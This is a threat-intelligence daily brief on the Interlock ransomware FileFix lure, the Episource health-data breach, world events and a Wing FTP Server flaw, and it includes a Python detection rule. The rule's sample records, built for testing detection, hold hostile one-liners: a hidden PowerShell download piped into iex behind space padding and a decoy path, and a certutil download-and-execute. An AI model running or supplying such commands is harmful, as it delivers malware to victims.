
ZeroFox Daily Intelligence Brief - July 15, 2025

by Alpha Team


ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

  • Interlock Attacks Deploy RAT Using FileFix
  • U.S. Healthcare Company Episource Informs Millions of Data Breach
  • Geopolitical Focus: New York Drone Attack Warning, Russia Sanctions Threat, and More

Interlock Attacks Deploy RAT Using FileFix

Source: https://www.bleepingcomputer.com/news/security/interlock-ransomware-adopts-filefix-method-to-deliver-malware/
What we know: Threat actors are using a phishing technique called “FileFix” in Interlock ransomware attacks to trick users into pasting disguised PowerShell commands into the File Explorer address bar, which executes the pasted text as a command rather than opening a path.

Context: The pasted command downloads a PHP-based remote access trojan (RAT) that gathers and exfiltrates system data. Once active, the RAT performs system reconnaissance, maintains persistence via registry changes, and gives the threat actors a foothold for lateral movement over Remote Desktop Protocol (RDP).
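The FileFix chain ends with explorer.exe launching the script host the victim pasted a command into, and that parent/child pair is the detection hook. The following Python is an added example, not code from the ZeroFox brief or the cited article: it runs a FileFix-style rule over constructed Sysmon Event ID 1 (process creation) records, requiring explorer.exe as the parent and at least one command-line cue (download, encoded payload, hidden window, execution-policy bypass, or whitespace padding). The padding cue assumes the shape of the public FileFix proof of concept, in which the real command is followed by a long run of spaces and a decoy file path behind a `#`, so only the path is visible in the address bar. Field names mirror Sysmon, but every record below is made up.

```python
"""FileFix-style detection over Sysmon process-creation (Event ID 1) records.

Added example for this brief; not code from ZeroFox or the cited article.
The records below are constructed test data with Sysmon-like field names.
"""
import re

# Script hosts a pasted File Explorer command would typically invoke.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line cues that separate a pasted one-liner from a user simply
# opening a shell. "padding" follows the public FileFix proof-of-concept
# shape (assumption): real command, a long run of spaces, then '#' and a
# decoy path so only the path is visible in the address bar.
CUES = {
    "download": re.compile(
        r"\b(invoke-webrequest|iwr|curl|wget|downloadstring|downloadfile|"
        r"net\.webclient|bitsadmin|certutil)\b", re.I),
    "encoded": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    "padding": re.compile(r" {20,}#"),
}


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list:
    """Return the cue names that fire for one record; [] if not FileFix-like.

    The FileFix parent/child pair (explorer.exe -> script host) is required;
    at least one command-line cue is then needed to separate it from a user
    launching a shell from the Start menu or Run dialog.
    """
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in SHELLS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in CUES.items() if rx.search(cmd)]


def detect(events) -> list:
    """Run analyze() over a batch and return one alert dict per hit."""
    alerts = []
    for ev in events:
        cues = analyze(ev)
        if cues:
            alerts.append({"record": ev["RecordId"], "user": ev["User"],
                           "image": basename(ev["Image"]), "cues": cues})
    return alerts


EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

# Constructed records (not real telemetry). Record 1 mimics a FileFix lure;
# record 2 is a user opening PowerShell normally; record 3 has a download
# cue but a different parent; record 4 is a pasted cmd.exe one-liner.
SAMPLE_EVENTS = [
    {"RecordId": 1, "User": "CORP\\jdoe", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": ('powershell.exe -w hidden -ep bypass -c "iwr http://198.51.100.23/update.php'
                     ' -UseBasicParsing | iex"' + " " * 40
                     + r"# C:\company\internal-secure\filedrive\HRPolicy.docx")},
    {"RecordId": 2, "User": "CORP\\jdoe", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": f'"{PS}"'},
    {"RecordId": 3, "User": "CORP\\asmith", "ParentImage": OUTLOOK, "Image": PS,
     "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://203.0.113.7/x')"},
    {"RecordId": 4, "User": "CORP\\asmith", "ParentImage": EXPLORER, "Image": CMD,
     "CommandLine": "cmd.exe /c certutil -urlcache -split -f http://203.0.113.7/a.exe a.exe && a.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Records 1 and 4 alert; record 2 shows why the parent/child pair alone is not enough (explorer.exe is also the parent when a user opens PowerShell from the Start menu), and record 3 shows that this rule is deliberately scoped to the FileFix chain, so other parents such as mail clients need their own rule. Treat the cue list as a starting point to tune against your own baseline, not a complete signature.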

Analyst note: Interlock ransomware actors are likely using the FileFix technique to bypass victims' endpoint defenses, since the user, not a malicious document or macro, launches the command. The resulting access enables network mapping, privilege escalation, and lateral movement, ultimately facilitating more targeted and damaging ransomware deployments.

U.S. Healthcare Company Episource Informs Millions of Data Breach

Source: https://techcrunch.com/2025/07/14/episource-is-notifying-millions-of-people-that-their-health-data-was-stolen/

What we know: U.S.-based healthcare billing company Episource is informing millions of its patients and other members of a data breach following a cyberattack in January and February 2025. The breach has affected over 5.4 million people across the United States.

Context: The stolen information contains personally identifiable information (PII), medical record data—including test results—and health insurance information. The incident was reportedly a ransomware attack, though Episource has not disclosed the nature of the attack.

Analyst note: Threat actors are likely to demand ransom from multiple healthcare organizations working with Episource to not post the stolen data publicly. Exposed individuals and organizations are likely to be targeted in financially-motivated blackmailing, phishing, social engineering, and impersonation attacks.

Geopolitical Focus: New York Drone Attack Warning, Russia Sanctions Threat, and More

  • New York Governor Kathy Hochul has warned of drone attacks during future high-profile events like the FIFA World Cup and the U.S. 250th anniversary celebrations, seeking a boost in federal defenses.
  • U.S. President Donald Trump has announced a new weapons deal with Ukraine, while warning of secondary sanctions against Russia threatening to hit its oil exports to buyers like India and China, if Moscow does not reach a peace deal in 50 days.
  • Excessive rainfall and flash flood warnings have been issued for central Texas, New York City, and New Jersey. Florida remains on flood watch. Rescue efforts in central Texas have been hindered by weekend rainfall, while the statewide death toll remains at 132.
  • Israel said that it carried out military strikes against tanks in southern Syria to protect the Druze, a minority Israel regards as loyal to it. Syrian government forces and Bedouin tribes have been clashing with Druze militias in the latest escalation of sectarian conflict in the country.
  • India has ordered airlines to check fuel control switches in Boeing airplanes after their suspected involvement in the Air India crash that killed 260 people in June 2025. A preliminary report into the crash found that fuel was cut off to engines moments after take-off.

DEEP AND DARK WEB INTELLIGENCE

Exploit user Escobar: Untested threat actor "Escobar" has been advertising extended validation (EV) code signing certificates, claiming they are registered to legitimate Russian companies over three years old. If the claims are true, attackers could proliferate malicious payloads that are less likely to be flagged since the certificates are tied to real companies, making them effective for sophisticated phishing and other social engineering attacks.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2025-47812: This remote code execution vulnerability in Wing FTP Server allows threat actors to inject arbitrary Lua code, leading to server compromise. Threat actors could exploit vulnerable servers to steal data, deploy malware, and move laterally within networks. CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.

Affected products: Wing FTP Server before version 7.4.4

Tags: DIB, TLP:GREEN